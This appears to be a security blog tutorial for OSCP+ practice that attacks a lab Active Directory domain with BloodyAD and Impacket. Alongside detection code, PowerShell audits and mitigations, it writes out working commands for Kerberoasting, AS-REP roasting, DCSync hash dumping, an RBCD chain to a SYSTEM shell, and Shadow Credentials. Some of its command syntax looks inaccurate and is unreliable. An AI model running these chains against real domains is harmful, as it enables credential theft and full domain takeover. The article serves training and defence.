
Introduction:
Active Directory (AD) remains the primary authentication backbone in enterprise Windows environments, yet misconfigurations and excessive privileges create exploitable attack paths that red teamers must master for exams like OSCP+. This article extracts and expands upon the official Ignite Technologies CTF practice training and the comprehensive BloodyAD penetration testing guide, delivering hands-on commands and techniques to simulate real-world exam scenarios.
Learning Objectives:
- Execute LDAP-based enumeration and privilege escalation using BloodyAD on Linux
- Perform Kerberoasting, AS-REP Roasting, and DCSync attacks against a domain controller
- Apply advanced AD exploitation techniques including RBCD, Shadow Credentials, and ACL abuse
You Should Know:
1. BloodyAD Installation & Basic Enumeration
BloodyAD is a Python tool communicating over LDAP(S) and SAMR to manipulate AD objects without Windows GUI. Install it on Kali or any Linux distribution:
```bash
# Install BloodyAD from source
git clone https://github.com/CravateRouge/bloodyAD.git
cd bloodyAD
pip install -r requirements.txt
python3 setup.py install

# Alternative via pip
pip install bloodyAD
```
Step‑by‑step enumeration of domain objects:
Connect to the domain controller (IP 192.168.1.11, domain ignite.local) using valid credentials:
```bash
# List all computer accounts
bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' get children --otype computer

# List all user accounts
bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' get children --otype useronly

# Enumerate containers and OUs
bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' get children --otype container
```
What this does: The `get children` command queries the LDAP directory tree, returning distinguished names (DNs) of all objects matching the specified type. This maps the AD structure, revealing workstations, servers, managed service accounts, and user accounts for further targeting.
2. Password Attacks: Kerberoasting & AS-REP Roasting
Kerberoasting exploits service accounts with SPNs (Service Principal Names). Extract Kerberos TGS tickets and crack offline:
```bash
# Using Impacket GetUserSPNs
impacket-GetUserSPNs -dc-ip 192.168.1.11 ignite.local/administrator:'Ignite@987' -request

# Save output to hash.txt and crack with hashcat (mode 13100)
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
```
AS‑REP Roasting targets users without pre‑authentication required:
```bash
impacket-GetNPUsers ignite.local/ -dc-ip 192.168.1.11 -no-pass -usersfile users.txt
```
Step‑by‑step credential exploitation:
1. Enumerate users with `get children --otype useronly`
2. Identify accounts with `UAC_DONT_REQUIRE_PREAUTH` using BloodyAD: `bloodyAD --host 192.168.1.11 -d ignite.local -u user -p pass get object`
3. Extract the AS-REP hash for any vulnerable account
4. Crack with Hashcat mode 18200
3. DCSync Attack – Dumping All Credentials
DCSync mimics a domain controller to replicate password hashes, requiring `DS-Replication-Get-Changes` privileges. Grant permissions via BloodyAD:
```bash
# Grant DCSync rights to a controlled user
bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' add dcSync <controlled_user>

# Verify with secretsdump (Impacket)
impacket-secretsdump -just-dc -dc-ip 192.168.1.11 ignite.local/<controlled_user>:'<password>'@192.168.1.11
```
Cleaning up – remove DCSync rights:
`bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' remove dcSync`
Why critical: A successful DCSync hands the attacker the `krbtgt` hash, enabling Golden Ticket attacks and therefore full domain compromise. Mitigation requires strict auditing of who holds replication rights on the domain head and use of the Protected Users group for privileged accounts.
4. Resource-Based Constrained Delegation (RBCD) Exploitation
RBCD lets an account listed in a target's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute obtain service tickets to that target on behalf of other users. Attack chain:
Step 1 – Create attacker‑controlled computer account:
`bloodyAD --host 192.168.1.11 -d ignite.local -u user -p pass add computer attacker-pc --password Pass123`
Step 2 – Configure RBCD on the domain controller:
`bloodyAD --host 192.168.1.11 -d ignite.local -u user -p pass set rbcd DC$ attacker-pc`
Step 3 – Request impersonation ticket (S4U2Self + S4U2Proxy) using Impacket:
```bash
impacket-getST -spn cifs/DC.ignite.local -impersonate Administrator -dc-ip 192.168.1.11 ignite.local/attacker-pc:Pass123
```
Step 4 – Use ticket to get SYSTEM shell:
```bash
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass -dc-ip 192.168.1.11 DC.ignite.local
```
What this does: RBCD bypasses traditional delegation restrictions, allowing lateral movement from an unprivileged machine to the domain controller. Defenders should monitor event IDs 4742 and 5136 for delegation changes.
5. Shadow Credentials Attack
Add rogue key credentials to a target machine account, enabling authentication without the real password:
```bash
# Add Shadow Credentials to DC$
bloodyAD --host 192.168.1.11 -d ignite.local -u user -p pass add shadowCredentials DC$ --password NewPass

# Retrieve NT hash via PKINIT
impacket-getTGT -dc-ip 192.168.1.11 ignite.local/DC$ -keytab shadow.keytab
```
Step‑by‑step attack flow:
1. Enumerate machines with `get children --otype computer`
2. For each machine, attempt `add shadowCredentials` (requires `GenericWrite` or `GenericAll` ACL permission)
3. Once shadow credentials are added, authenticate using PKINIT
4. Dump the machine account hash and use it for pass-the-hash
Detection: Monitor LDAP writes to `msDS-KeyCredentialLink` attribute (event ID 4662). Windows Defender for Identity alerts on this behavior.
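The detection guidance for sections 3 to 5 (replication rights for DCSync, `msDS-AllowedToActOnBehalfOfOtherIdentity` for RBCD, `msDS-KeyCredentialLink` for Shadow Credentials) as a small triage routine over Windows Security events. This is an added example, not code from the article or the BloodyAD project; the event field names follow the Windows Security log schema, while the sample records and the `DC$` replication allowlist are assumptions for the ignite.local lab.

```python
"""Triage Windows Security events for the AD abuse paths covered above.

Added example, not from the article or the BloodyAD project. SAMPLE_EVENTS are
constructed, simplified records carrying the fields a SIEM extracts from Event
IDs 5136 (directory object modified) and 4662 (object operation; needs SACLs).
"""
from typing import Dict, List

# LDAP attributes whose modification signals the RBCD and Shadow Credentials paths
WATCHED_ATTRIBUTES = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD configured",
    "msDS-KeyCredentialLink": "Shadow Credentials written",
}
# Extended-right GUIDs requested during DCSync replication
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumption: only the DC machine account is expected to replicate in this lab
REPLICATION_ALLOWLIST = {"DC$"}

def triage(events: List[Dict[str, object]]) -> List[str]:
    """Return one alert string per suspicious event, preserving input order."""
    alerts: List[str] = []
    for ev in events:
        subject = str(ev.get("SubjectUserName", "?"))
        if ev.get("EventID") == 5136:
            attr = str(ev.get("AttributeLDAPDisplayName", ""))
            if attr in WATCHED_ATTRIBUTES:
                alerts.append(f"{WATCHED_ATTRIBUTES[attr]} on {ev.get('ObjectDN')} by {subject}")
        elif ev.get("EventID") == 4662:
            props = str(ev.get("Properties", "")).lower()
            hits = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
            if hits and subject not in REPLICATION_ALLOWLIST:
                alerts.append(f"DCSync-style replication ({', '.join(hits)}) by {subject}")
    return alerts

DC_DN = "CN=DC,OU=Domain Controllers,DC=ignite,DC=local"
SAMPLE_EVENTS = [  # constructed sample records, not real telemetry
    {"EventID": 5136, "SubjectUserName": "lowpriv", "ObjectDN": DC_DN,
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "SubjectUserName": "lowpriv", "ObjectDN": DC_DN,
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "helpdesk", "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=bob,CN=Users,DC=ignite,DC=local"},  # routine change, must not alert
    {"EventID": 4662, "SubjectUserName": "lowpriv",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC$",  # legitimate DC-to-DC replication
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]
```

Running `triage(SAMPLE_EVENTS)` produces three alerts (the two attribute writes to `DC` and the replication request by `lowpriv`) and stays silent on the helpdesk description change and the DC's own replication.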
6. Linux & Windows Commands for AD Hardening
Linux (Defender perspective – enumeration detection):
```bash
# Monitor LDAP queries in real time. LDAP is BER-encoded, so grepping the raw
# payload for the literal string "searchRequest" will not match; use the
# Wireshark LDAP dissector instead (searchRequest is protocolOp 3):
sudo tshark -i eth0 -f 'port 389' -Y 'ldap.protocolOp == 3'

# BloodyAD leaves audit logs: check Windows event 4662 (object access auditing)
```
Windows (PowerShell – defensive checks):
```powershell
# Find users with Kerberoastable SPNs
Get-ADUser -Filter {ServicePrincipalName -ne ""} -Properties ServicePrincipalName

# Detect AS-REP roastable accounts (no preauth; 4194304 = DONT_REQUIRE_PREAUTH)
Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl

# Check for DCSync rights on the domain head
Get-ADObject -Filter {ObjectClass -eq "domain"} -Properties ntSecurityDescriptor |
    Select-Object -ExpandProperty ntSecurityDescriptor |
    ForEach-Object { $_.Access | Where-Object { $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" } }
```
Step‑by‑step mitigation:
- Enforce Kerberos pre‑authentication for all users
- Use Group Managed Service Accounts (gMSA) with automatic password rotation
- Implement tiered administration – separate privileged accounts
- Deploy LAPS for local admin password management
7. Report Writing for OSCP+ (Professional Template)
OSCP+ requires professional documentation. Structure your penetration test report:
Executive Summary: 1–2 paragraphs on business impact
Methodology: Include tools (BloodyAD, Impacket, Hashcat), attack chain diagram
Findings Table:
| Vulnerability | Severity | Affected Asset | Remediation |
|---|---|---|---|
| DCSync Permissions Misconfiguration | Critical | DC.ignite.local | Remove replication rights from non-DCs |
| Kerberoastable Service Account | High | sql_svc | Change to gMSA, enforce 20+ char password |
Step‑by‑step evidence inclusion:
1. Screenshot of BloodyAD enumeration output
2. Command logs with timestamps
3. Proof of hash extraction (cracked password shown as example)
4. Recommended commands to fix (PowerShell / Group Policy)
What Undercode Say:
- Key Takeaway 1: BloodyAD transforms Linux‑based red teaming by eliminating Windows GUI dependencies, making AD attacks stealthier and scriptable – essential for OSCP+ exam scenarios.
- Key Takeaway 2: The most dangerous misconfigurations remain DCSync over‑privileging and RBCD delegation – both allow domain administrator equivalent access without ever cracking a single password. Organizations must audit ACLs and replicate detection rules focusing on LDAP attribute modifications (msDS-AllowedToActOnBehalfOfOtherIdentity, ds-Replication-Get-Changes). The provided BloodyAD guide demonstrates that a single compromised low‑privilege user with accidental write permissions can escalate to full domain takeover in under ten commands, emphasizing the critical need for hardened administrative tiers and periodic red team exercises.
Prediction:
By 2027, cloud‑synced AD environments and Entra ID (Azure AD) will see a 300% increase in RBCD‑style lateral movement attacks as hybrid identities blur on‑premises boundaries. Tools like BloodyAD will evolve to support OAuth2 token manipulation and cross‑tenant delegation abuses. OSCP+ exams will accordingly shift focus from standalone AD forests to hybrid attack chains involving Entra Connect sync permissions, forcing red teamers to master both LDAP and Graph API exploitation. Organizations that fail to implement real‑time LDAP attribute monitoring and automated privilege escalation detection will face compromise within hours of initial access.
Reported By: Yashika Dhir – Hackers Feeds